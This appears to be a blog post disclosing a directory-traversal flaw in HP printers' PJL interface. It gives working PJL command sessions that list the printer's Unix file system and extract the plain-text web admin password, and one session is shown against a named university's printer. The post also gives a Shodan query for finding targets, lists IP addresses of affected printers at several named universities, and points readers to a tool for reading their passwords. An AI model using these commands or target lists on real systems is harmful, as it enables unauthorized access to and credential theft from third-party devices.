Talking about cyber-security, the first thing coming to your mind might be personal computers or server racks, maybe surveillance cameras considering the NSA affair. At least, printers will probably not be the first thing you might think of. However, it is important to not neglect them.
Basics of PJL
PJL is an acronym for printer job language, a protocol developed by Hewlett Packard (HP) in order to provide a simple communication method between a host, usually a personal computer commanded to print a document, and the printer. Being running on port 9100 by default, PJL is not only restricted to HP printers but being used by other printer models as well. The language provides a set of commands, including file system commands to download and upload files remotely from and to the printing device.
A basic PJL session might look like this:
user@client:~$ telnet 192.168.178.100 9100 Trying 192.168.178.100... Connected to 192.168.178.100. Escape character is '^]'.
^[%-12345X@PJL @PJL INFO ID @PJL INFO ID "Brother MFC-7840W:8C5-C17:Ver.L" @PJL ECHO Hello World @PJL ECHO Hello World
While the INFO command having the parameter ID requests the printer to reply with its model name and version, ECHO has the printer reply with the subsequent message Hello World. This is not too thrilling yet until you are playing around with the file system commands prefixed by FS*. For example, @PJL FSDIRLIST NAME=”0:\” ENTRY=0 COUNT=999 replies with a list of files located on volume 0:\. On most HP printers, this exposes some web server related files to curious eyes. However, what should not happen is that you can escape volume 0:\ by using a double-dot. But this is exactly what you can do and is called directory traversal attack. 0:\..\ reveals the parent directory of volume 0:\ and 0:\..\..\ is sufficient on most HP printers to get access to the root directory of the underlying Unix system.
Open file systems
Open printer file systems allow you to directly upload files to the printer’s web directory. Visit http://lks-350-375e-038-d.ls.berkeley.edu/hp/device/pjlexploit/PoC.html for a proof of concept. Although there is a protection against file system access, namely a 16-bit PJL password which has to be set via the PJL interface, it is too complicated for standard or even advanced users who would have to know the PJL specifications in order to set it up. Secondly, a 16-bit PJL password can be successfully brute-forced within hours.
Plain text passwords
Storing plain text passwords is a sin which you are only allowed to commit as an absolute security beginner. You may not practice this technique when you are an embedded systems developer for a company whose printers are shipped worldwide. However, this is exactly what HP developers have done. Since you have access to a large part of the Unix file system which only seems to be restricted by native file permissions, you are now allowed to download the file at 0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat using the PJL-command FSUPLOAD (PJL commands are named based on the perspective of the printer). Guess what this file consists of. If you read a null-terminated ASCII-string starting at position 0x0c, you will notice that this string contains the web interface administration password.
Just look at the following short PJL session which will fully exploit this vulnerability. This was a session to 126.96.36.199 at the University of Calfornia in Los Angeles and selected as an example because of the highly creative password choice.
^[%-12345X@PJL @PJL FSUPLOAD NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16 @PJL FSUPLOAD FORMAT:BINARY NAME="0:\..\..\hpmnt\dsk_cf0a\PermStore\ps_3D_0D.dat" OFFSET=12 SIZE=16 password
Explore printers yourself
A web-based PJL exploring tool called PJL Explorer has been developed in order to allow easy graphical access to the printer file system. You can access it at http://blechschmidt.saarland/printers/. PJL Explorer allows you to browse the printer file system, upload and delete files. To find vulnerable printers, run the following search query using a free Shodan account: port:9100 hp.
The source code of the PJL Explorer is available on Github.
Universities of Harvard, Princeton and Cambridge affected
Harvard: 188.8.131.52, 184.108.40.206, 220.127.116.11
Massachusetts Institute of Technoloy: 18.104.22.168, 22.214.171.124
Princeton: 126.96.36.199, 188.8.131.52, 184.108.40.206
Cambridge: 220.127.116.11, 18.104.22.168
Stanford University: 22.214.171.124
University of California, Berkeley: 126.96.36.199, 188.8.131.52, 184.108.40.206
University of California, Los Angeles: 220.127.116.11, 18.104.22.168, 22.214.171.124
For legal reasons, passwords are not included in this blog post. To view a printer password, please click one of the above links in order to use the PJL Explorer in order to display the passwords.